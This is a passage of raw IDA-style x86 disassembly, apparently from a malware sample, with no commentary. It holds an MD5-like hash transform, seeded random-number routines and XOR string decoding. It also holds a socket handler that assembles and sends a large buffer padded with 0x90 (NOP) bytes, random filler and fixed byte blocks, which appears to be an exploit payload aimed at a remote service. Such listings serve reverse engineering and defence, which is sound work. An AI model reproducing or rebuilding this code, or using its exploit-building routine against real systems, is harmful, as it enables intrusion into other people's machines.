or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0BD6DDBCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+432AFF97h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-546BDC59h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-36C5FC7h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+655B59C3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-70F3336Eh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-100B83h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-7A7BA22Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6FA87E4Fh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1D31920h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5CFEBCECh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4E0811A1h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-8AC817Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-42C50DCBh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+2AD7D2BBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-14792C6Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx+0Ch], eax
leave
retn
sub_40F3CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410244 proc near ; CODE XREF: sub_40F3CE+F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_410263
; ---------------------------------------------------------------------------
loc_410253: ; CODE XREF: sub_410244+66�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_410263: ; CODE XREF: sub_410244+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_4102AC
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+1]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+2]
shl ecx, 10h
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+3]
shl ecx, 18h
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [edx+ecx*4], eax
jmp short loc_410253
; ---------------------------------------------------------------------------
locret_4102AC: ; CODE XREF: sub_410244+25�j
leave
retn
sub_410244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102AE proc near ; CODE XREF: sub_4167F1+DF�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0F0000000h
push 1
push 0
push 0
lea eax, [ebp+var_4]
push eax
call ds:dword_417024 ; CryptAcquireContextA
push offset dword_41EADC
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EAE0
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EAE4
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EAE8
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push 0
push [ebp+var_4]
call ds:dword_41701C ; CryptReleaseContext
leave
retn
sub_4102AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410318 proc near ; CODE XREF: sub_4103F5+6�p
; sub_410422+6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
lock xadd dword_41EADC, eax
add eax, ebx
lock xadd dword_41EAE0, eax
add eax, ecx
lock xadd dword_41EAE4, eax
add eax, edx
lock xadd dword_41EAE8, eax
add eax, esi
lock xadd dword_41EADC, eax
add eax, edi
lock xadd dword_41EAE0, eax
add eax, ebp
lock xadd dword_41EAE4, eax
add eax, esp
lock xadd dword_41EAE8, eax
call sub_416B64 ; clock
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lock xadd dword_41EADC, eax
lock xadd dword_41EAE0, eax
lock xadd dword_41EAE4, eax
lock xadd dword_41EAE8, eax
add ecx, ebx
ror ebx, cl
lock xadd dword_41EAE4, ebx
add ecx, ecx
ror ecx, cl
lock xadd dword_41EAE0, ecx
add ecx, edx
ror edx, cl
lock xadd dword_41EADC, edx
rol eax, cl
add ecx, eax
ror ebx, cl
add ecx, ebx
ror ecx, cl
add ecx, 211h
rol edx, cl
add ecx, edx
lock xadd dword_41EAE8, edx
lock xadd dword_41EAE4, ecx
lock xadd dword_41EAE0, ebx
lock xadd dword_41EADC, eax
pop edi
pop esi
pop ebx
leave
retn
sub_410318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103F5 proc near ; CODE XREF: sub_4020C2+10B�p
; sub_4040E8+2D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE8, eax
mov ecx, [ebp+arg_4]
sub ecx, [ebp+arg_0]
xor edx, edx
inc ecx
div ecx
mov eax, edx
add eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4103F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410422 proc near ; CODE XREF: sub_40CF2F:loc_40CFBC�p
; sub_40D871+D3F�p ...
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE8, eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41043F proc near ; CODE XREF: sub_4055E5+715�p
; sub_4055E5+78B�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE4, eax
and eax, 0FFFFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41043F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410461 proc near ; CODE XREF: sub_4104A3+42�p
; sub_4125DF:loc_4126B8�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE0, eax
and eax, 0FFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410461 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410483 proc near ; CODE XREF: sub_4055E5+72B�p
; sub_40D7E5+57�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EADC, eax
and eax, 1
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410483 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104A3 proc near ; CODE XREF: sub_40A9CF+D4C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_4104AF
jmp short locret_4104FF
; ---------------------------------------------------------------------------
loc_4104AF: ; CODE XREF: sub_4104A3+8�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4104B5: ; CODE XREF: sub_4104A3+34�j
cmp [ebp+arg_4], 3
jbe short loc_4104D9
call sub_410422
mov ecx, [ebp+var_4]
mov [ecx], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
jmp short loc_4104B5
; ---------------------------------------------------------------------------
loc_4104D9: ; CODE XREF: sub_4104A3+16�j
mov eax, [ebp+var_4]
mov [ebp+arg_0], eax
loc_4104DF: ; CODE XREF: sub_4104A3+5A�j
cmp [ebp+arg_4], 0
jbe short locret_4104FF
call sub_410461
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
mov [ebp+arg_4], eax
jmp short loc_4104DF
; ---------------------------------------------------------------------------
locret_4104FF: ; CODE XREF: sub_4104A3+A�j
; sub_4104A3+40�j
leave
retn
sub_4104A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410501 proc near ; CODE XREF: sub_403260+36�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_410510
xor eax, eax
jmp short locret_41055D
; ---------------------------------------------------------------------------
loc_410510: ; CODE XREF: sub_410501+9�j
cmp [ebp+arg_10], 0
jnz short loc_41051C
mov eax, [ebp+arg_4]
mov [ebp+arg_10], eax
loc_41051C: ; CODE XREF: sub_410501+13�j
push [ebp+arg_10]
push [ebp+arg_4]
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov [ebp+var_4], eax
loc_410532: ; CODE XREF: sub_410501+57�j
cmp [ebp+var_4], 0
jbe short loc_41055A
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
jmp short loc_410532
; ---------------------------------------------------------------------------
loc_41055A: ; CODE XREF: sub_410501+35�j
mov eax, [ebp+var_8]
locret_41055D: ; CODE XREF: sub_410501+D�j
leave
retn
sub_410501 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41055F proc near ; CODE XREF: sub_4167F1+F0�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EAF0
call sub_40F26E
pop ecx
pop ecx
lea esi, byte_41EAF0
mov edi, esi
push 10h
pop ecx
loc_41059F: ; CODE XREF: sub_41055F+47�j
lodsb
or eax, 80h
stosb
loop loc_41059F
pop edi
pop esi
pop ebx
leave
retn
sub_41055F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105AD proc near ; CODE XREF: sub_406E8E+C6�p
; sub_406E8E+14A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jle short loc_4105BE
jmp short locret_4105F9
; ---------------------------------------------------------------------------
loc_4105BE: ; CODE XREF: sub_4105AD+D�j
and [ebp+var_4], 0
jmp short loc_4105CB
; ---------------------------------------------------------------------------
loc_4105C4: ; CODE XREF: sub_4105AD+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4105CB: ; CODE XREF: sub_4105AD+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_4105F9
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, byte_41EAF0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4105C4
; ---------------------------------------------------------------------------
locret_4105F9: ; CODE XREF: sub_4105AD+F�j
; sub_4105AD+29�j
leave
retn
sub_4105AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105FB proc near ; CODE XREF: sub_401000+4A�p
; sub_4043E9+1A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jg short loc_41060C
jmp short locret_410647
; ---------------------------------------------------------------------------
loc_41060C: ; CODE XREF: sub_4105FB+D�j
and [ebp+var_4], 0
jmp short loc_410619
; ---------------------------------------------------------------------------
loc_410612: ; CODE XREF: sub_4105FB+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410619: ; CODE XREF: sub_4105FB+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_410647
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, byte_41EAF0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_410612
; ---------------------------------------------------------------------------
locret_410647: ; CODE XREF: sub_4105FB+F�j
; sub_4105FB+29�j
leave
retn
sub_4105FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410649 proc near ; DATA XREF: .data:off_41CCFE�o
var_1B78 = dword ptr -1B78h
var_1B74 = byte ptr -1B74h
var_B74 = byte ptr -0B74h
var_B6C = dword ptr -0B6Ch
var_B64 = dword ptr -0B64h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_280 = byte ptr -280h
var_276 = byte ptr -276h
var_272 = byte ptr -272h
var_23A = byte ptr -23Ah
var_236 = byte ptr -236h
var_232 = byte ptr -232h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1B78h
call sub_416BC0
push 48h
push offset dword_41A7B0
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410686
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_410686: ; CODE XREF: sub_410649+36�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call ds:dword_417248 ; recv
push 7
push offset dword_41A7A8
mov eax, [ebp+arg_0]
push dword ptr [eax+2Ah]
mov eax, [ebp+arg_0]
add eax, 146h
push eax
mov eax, [ebp+arg_0]
add eax, 0C6h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp+var_200]
push eax
call sub_4125DF
add esp, 20h
mov [ebp+var_370], eax
cmp [ebp+var_370], 0
jnz short loc_4106F0
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_4106F0: ; CODE XREF: sub_410649+A0�j
and [ebp+var_374], 0
jmp short loc_410706
; ---------------------------------------------------------------------------
loc_4106F9: ; CODE XREF: sub_410649+E1�j
mov eax, [ebp+var_374]
inc eax
mov [ebp+var_374], eax
loc_410706: ; CODE XREF: sub_410649+AE�j
cmp [ebp+var_374], 168h
jge short loc_41072C
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_374]
mov [ebp+ecx+var_36C], al
jmp short loc_4106F9
; ---------------------------------------------------------------------------
loc_41072C: ; CODE XREF: sub_410649+C7�j
push 0Ah
push offset loc_41A8A0
lea eax, [ebp+var_280]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8F0
lea eax, [ebp+var_276]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset loc_41A8E8
lea eax, [ebp+var_272]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8EC
lea eax, [ebp+var_23A]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push (offset loc_41A8E3+1)
lea eax, [ebp+var_236]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0Bh
push offset loc_41A894
lea eax, [ebp+var_232]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E6h
sub eax, [ebp+var_370]
mov [ebp+var_204], eax
and [ebp+var_1B78], 0
push 18h
push offset dword_41A7FC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 18h
mov [ebp+var_1B78], eax
push 44h
push offset dword_41A818
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 44h
mov [ebp+var_1B78], eax
push 20h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 20h
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8AC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8E0
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset dword_41A8D8
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8DC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 58h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 58h
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8B4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push 8
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 8
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8BC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8C4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push [ebp+var_204]
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, [ebp+var_204]
mov [ebp+var_1B78], eax
push [ebp+var_370]
lea eax, [ebp+var_200]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, [ebp+var_370]
mov [ebp+var_1B78], eax
push 168h
lea eax, [ebp+var_36C]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 168h
mov [ebp+var_1B78], eax
push 0Ah
push offset aA ; "\\A"
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 0Ah
mov [ebp+var_1B78], eax
push 32h
push offset dword_41A860
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 32h
mov [ebp+var_1B78], eax
mov eax, [ebp+var_1B78]
mov [ebp+var_B6C], eax
mov eax, [ebp+var_1B78]
sub eax, 18h
mov [ebp+var_B64], eax
push [ebp+var_1B78]
lea eax, [ebp+var_B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410B36
jmp short locret_410B50
; ---------------------------------------------------------------------------
loc_410B36: ; CODE XREF: sub_410649+4E9�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call ds:dword_417248 ; recv
locret_410B50: ; CODE XREF: sub_410649+38�j
; sub_410649+A2�j ...
leave
retn
sub_410649 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 104Ch
call sub_416BC0
push 7
push offset dword_41A7A8
mov eax, [ebp+8]
push dword ptr [eax+2Ah]
mov eax, [ebp+8]
add eax, 146h
push eax
mov eax, [ebp+8]
add eax, 0C6h
push eax
mov eax, [ebp+8]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp-204h]
push eax
call sub_4125DF
add esp, 20h
mov [ebp-20Ch], eax
cmp dword ptr [ebp-20Ch], 0
jnz short loc_410BAF
jmp locret_410F5E
; ---------------------------------------------------------------------------
